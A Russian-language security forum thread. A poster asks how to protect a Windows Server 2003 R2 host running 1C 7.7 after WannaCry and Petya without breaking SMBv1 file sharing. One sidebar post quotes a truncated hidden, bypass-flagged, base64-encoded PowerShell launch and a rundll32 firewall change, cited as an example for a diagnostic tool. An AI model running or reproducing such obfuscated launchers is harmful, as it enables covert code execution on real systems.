Перейти к содержанию

Recommended Posts

@diagnoz_twit

Доброго времени.

Извиняюсь, если поднял тему не в том разделе форума, переместите пожалуйста. После всем известных атак WannaCry и PetyA, на предприятии также пострадало значительное количество ПК, все было "поднято" заново в том числе и несколько серверов. Были также установлены соответствующие патчи на пользовательские ПК и отключен SMBv1. В организации на всех пользовательских ПК стоят Windows 7 SP1 Enterprise, Windows XP нет совсем и есть несколько серверов с установленными Windows Server 2003 R2, Windows Server 2008 R2 и Windows Server 2012 R2.

На  Windows Server 2003 R2 крутится старая 1С 7.7, с файловой базой данной с общим доступом на нем же. Установив патч для 2003 и отключив SMBv1 на нем (риск, но пока не отключен), логично предположить, что пользователи не смогут получать доступ к этой самой "расшареной" БД и работать с ней через терминальный доступ. И, например, выполнив какую-то работу на самом сервере, потребуется получить доступ к машинам с Windows 7 с самого сервера, а тут затык получится, если отключить протокол. Вопрос: как быть в такой ситуации, дабы обезопасить себя от использования данного уязвимого протокола, достаточно ли будет хотя бы, только, установки патча или еще какие-то рекомендации нужно выполнить? Сменить сервер на версию старше ровно как и 1С - пока не тот вариант. Резервные копии естественно регулярно выполняются. Та же ситуация и с другими, 2008 и 2012, тут отключить SMBv1 (в 2012 по умолчанию отключен) можно смело, так как писал выше, в сети машин с ХР нет.

Спасибо.

 

 

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×